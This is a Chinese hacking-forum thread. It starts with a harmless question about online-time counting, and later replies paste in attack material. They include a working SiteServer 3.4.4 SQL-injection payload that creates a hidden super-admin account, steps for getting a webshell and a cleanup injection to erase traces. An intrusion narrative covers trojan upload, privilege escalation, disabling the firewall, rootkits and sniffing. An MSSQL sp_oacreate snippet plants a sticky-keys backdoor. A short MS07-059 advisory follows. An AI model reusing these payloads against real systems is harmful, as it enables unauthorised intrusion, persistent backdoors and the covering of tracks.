最近看过此主题的会员

返回列表 发帖

[问题求助] 在线时间计时是不是有问题啊?

在线时间计时是不是有问题啊?

我这几天天天在线挂在,过一会就进来说句话,加点文章。。。。怎么每天就长了一小时啊。。。太杯具了吧。。。。????????

 

您可能还想看的主题:

每天就我一个人,我会孤单的

优蛋 /115网盘专用下载工具/ V2.1.11.126 简体绿色版

论坛内容及无效ID将进行一次清理

最近一直在闭门修行。。所以一直没上,今天有时间发一个贴 证明存在

【原创首发】每天就我一个人,我会孤单的

菜菜学社会学后的理解

全新的注入点检测方法

哥遇到黑阔了

寂寞杯电子竞技比赛时间调整

PHP的历史和优缺点

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:jeffzua发表,本帖发表者jeffzua符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者jeffzua和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

是不是需要有动作啊。
如果不动就不计算时间??

TOP

动作肯定是要有的,所以隔一会我就会动一下啊,但是不可能不停的老动吧。。搞多了也会累的嘛。。;P

TOP

3# jeffzua
呵呵,半个小时点一下嘛。
也没必要一直点。

TOP

过一定时间后系统自动收回在线登陆状态,目前已经做了调整不限制在线时长

TOP

{:2_42:}:victory:

TOP

这么多啊,

TOP

嗯~是那样的
๑۩۞۩๑ _一直在默默的潛行。

TOP

SiteServer 3.4.4 SQL注入漏洞
0x01 简介siteserver:
本文测试的版本是:
SiteServer系列产品 最新版本: 3.4.4 正式版 (2011年7月18日发布)
下载地址:http://www.siteserver.cn/download
客户案例:
http://www.siteserver.cn/customer
也百度了一下,发现客户数量还是不少的。
0x02: 漏洞描述:
问题出在UserCenter.Pages.DLL中的Register,注册流程逻辑有问题,具体如下:
1.程序先把用户名带入数据库中查询,如果用户名没有重复,进入第二步;
2.再在远程检测用户名中是否含有非法字符,如果没有,则进入第三步;
3.将新注册的用户插入数据库。
 
由于在进行第一步的时候,程序没有进行任何处理就带入数据库中查询,那么就可以xxoo了。 Orz。。。。
Example:
http://127.0.0.1/UserCenter/register.aspx
用户名填入以下语句,其他地方正常填写。
123');insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
提交注册之后就往库里面插入了一个用户名为:blue 密码为:lanhai 的超级用户。
默认后台地址为:http://127.0.0.1/siteserver
0x03 后台到webshell:
拿webshell或者直接提权是一个仁者见仁智者见智的活,各家有各家的方法,我大概看了一下,有3种方法-
一、
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
二、
成员权限-》添加用户-》用户名为:1.asp
http://127.0.0.1/usercenter/
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
(ps:后台添加用户时不会验证是否含有非法字符)
三、
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称,WEB路径
系统工具-》数据库工具-》SQL语句查询
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
 
0x04 扫尾:
xxoo完了之后记得到
http://127.0.0.1/UserCenter/register.aspx
再用
123');delete bairong_Administrator where UserName='blue';--
为用户名进行注册,做好痕迹清理工作。
最后,希望siteserver看到之后能及时修补,本文仅作为技术研究之用,请勿用于非法用途。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

有防火墙的网站我们也入侵
一、踩点   ping www.111.com 发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。   二、注入   从源文件里搜索关键字asp,找到了一个注入点。用nbsi注入,发现是sa口令登陆,去加了一个用户,显示命令完成。哈哈,看来管理员太粗心了。先上传一个webshell,上传了一个老兵的asp木马。接下来的就是个人习惯了,我平时入侵的习惯是先上传webshell,然后再把webshell提升为system权限。因为这样说可以说在入侵之时会非常的方便,我个人觉得这个方法非常好。   三、提升权限   先看哪些特权的:   cs cript C:InetpubAdminS criptsadsutil.vbs get /W3SVC/InProcessIsapiApps   得到:   Microsoft (R) Windows 脚本宿主版本 5.1 for Windows   版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.   InProcessIsapiApps : (LIST) (5 Items)   "C:WINNTsystem32idq.dll"   "C:WINNTsystem32inetsrvhttpext.dll"   "C:WINNTsystem32inetsrvhttpodbc.dll"   "C:WINNTsystem32inetsrvssinc.dll"   "C:WINNTsystem32msw3prt.dll"   把asp.dll加进去:   cs cript C:InetpubAdminS criptsadsutil.vbs   set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll" "C:WINNTsystem32   inetsrvhttpext.dll" "C:WINNTsystem32inetsrvhttpodbc.dll" "C:WINNTsystem32   inetsrvssinc.dll" "C:WINNTsystem32msw3prt.dll""c:winntsystem32   inetsrvasp.dll"   然后用asp木马加个用户,显示命令完成。   四、TerminalService   接下来就是开3389了,用net start显示,发现已开了TS服务,但端口上没有3389,觉得可能是改端口了。但事实上它们欺骗我的感情,我用netstat -an察看了一下,发现有3389,再从net start 里发现是对方的防火墙搞的鬼。算了,上传个木马吧,上传了一个改了特征码的20CN反弹木马,然后用木马在GUI下关掉了防火墙,再用3389登陆器登了上去,这里我这样做是因为我知道管理员一定不会在旁边。而对于这个时候,比较老道的方法大家可以用fpipe实现端口重定向,或者用httptunnel。和黑防里面说的那样,不过我试过没有成功过一次,而且我在收集资料里看到黑防的那篇和另外一个高手写的一模一样,不知道谁抄谁。还有一种工具是despoxy,(TCP tunnel for HTTP Proxies)大家有兴趣的话可以去试一下,它可以穿透http代理。   五、简单后门   1.改了FSO名,这样是让我自己享受,这个有system权限的马儿。   2.放了几个rootkit和几个网络上少见的后台。   3.我个从是不喜欢多放后台,觉得很烦。   六、Sniffer   1.TS界面下,下载了些嗅探器。先ARPsniffer图形的看了一下,晕死,没有一台内网机子。又看了一个外网,晕死,整个IP段都是。看来我的运行不错嘛,打开webdavscan查了一下,只有两三个IP是网站,而且是很小型的,接下来就没有什么动力了


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

sa无xp_cmdshell下提升权限简单方法
在用exec sp_oacreate 'wscript.shell'也没办法的情况下。。可用此方法   (很多服务器都把'wscript.shell'给删了。)   上网找了些资料,得到下面方法:   复制文件:   declare @o int   exec sp_oacreate 'scripting.filesystemobject', @o out   exec sp_oamethod @o, 'copyfile',null,'c:windowsexplorer.exe' ,'c:windowssystem32sethc.exe';   declare @oo int   exec sp_oacreate 'scripting.filesystemobject', @oo out


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

MS07-059:SharePoint Server 2007 中存在的漏洞
发布日期: 十月 9, 2007版本: 1.0
此安全更新解决 Microsoft Windows SharePoint Services 3.0 和 Microsoft Office SharePoint Server 2007 中的一个公开报告的漏洞。与工作站或者服务器环境中的特权提升相反,该漏洞可能允许攻击者运行可导致 SharePoint 站点中的特权提升的任意脚本。 该漏洞还可能允许攻击者运行任意脚本以修改用户的缓存,从而导致工作站上的信息泄露。
对于支持的 Microsoft Windows Server 2003 版本中的 Microsoft SharePoint Services 3.0 以及对于支持的 Microsoft Office SharePoint Server 2007,该安全更新等级为“重要”。
该安全更新通过修改 Microsoft Windows SharePoint Services 3.0 和 Microsoft Office SharePoint Server 2007 验证 URL 编码请求的方式来解决漏洞。
建议。 Microsoft 建议客户尽早应用此更新。
受影响的软件
软件 组件 最大安全影响 综合严重程度等级 此更新替代的公告 Windows Server 2003         Windows Server 2003 Service Pack 1 Microsoft Windows SharePoint Services 3.0(KB934525) 特权提升 重要 无 Windows Server 2003 Service Pack 2 Microsoft Windows SharePoint Services 3.0(KB934525) 特权提升 重要 无 Windows Server 2003 x64 Edition Microsoft Windows SharePoint Services 3.0(KB934525) 特权提升 重要 无 Windows Server 2003 x64 Edition Service Pack 2 Microsoft Windows SharePoint Services 3.0(KB934525) 特权提升 重要 无 Microsoft Office SharePoint Server 2007         Microsoft Office SharePoint Server 2007(KB937832)   特权提升 重要 无 Microsoft Office SharePoint Server 2007 x64 Edition(KB937832)   特权提升 重要 无
微软的安全公告:
http://www.microsoft.com/china/technet/security/bulletin/MS07-059.mspx
(以上链接均连到第三方网站)


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表